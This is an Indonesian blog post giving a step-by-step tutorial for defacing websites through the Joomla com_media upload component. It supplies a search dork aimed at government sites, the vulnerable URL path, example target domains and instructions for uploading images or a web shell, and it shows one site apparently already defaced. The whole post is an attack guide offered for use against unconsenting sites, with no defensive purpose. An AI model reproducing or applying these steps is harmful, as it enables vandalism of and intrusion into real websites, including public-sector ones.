Cara Deface Metode Com_Media

Assalamualaikum :)
kali ini saya akan beritahukan   Cara deface dengan Com_media
Ini Saya Repost Di Blog Saya Sendiri,

Berhubung udah banyak banget yang share, jadi saya juga ga mau ketinggalan,, hehehe Nah, topic kali ini membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla.. :) pada penasaran gimana caranya? so easy kok :)
Dork : i

nurl:com_media site:gov
exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

 *Site Bisa Diubah : it/my/cn dll.

Step By Step :
- pertama , anda cari dulu site target dengan menggunakan dork diatas :D

 

- kedua , anda pilih salah satu site target yang mau di deface :)

contoh : http://www.ner.cap.gov/se/index.php?option=com_media&view=imagesList&tmpl=component&folder=&asset=com_content&author=

- ketiga , anda masukan exploit yang ada diatas

contoh : http://www.ner.cap.gov/se/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 

 

- keempat , upload deh ...

berextensi : txt , png , jpg , klo anda beruntung bisa anda upload shell

klik browse , pilih gambar yg kamu mau dan klik start upload

- lanjut , tunggu hingga upload selesai ..

jika sudah selesai akan muncul tulisan Upload Complete: /namafile.png

 

- nah , untuk melihat file yang sudah kita upload tadi caranya seperti ini

http://site-target.com/images/namafile.png

contoh : http://www.directoryofbusinesses.co.za/images/sa.png  

 

- nah itu udah eheh , itu adalah lambang team saya :D

*tidak semua website bisa di deface dengan tehnik ini

sekian dulu artikel dari saya ehehe :D
Author: Dzikri Dot ID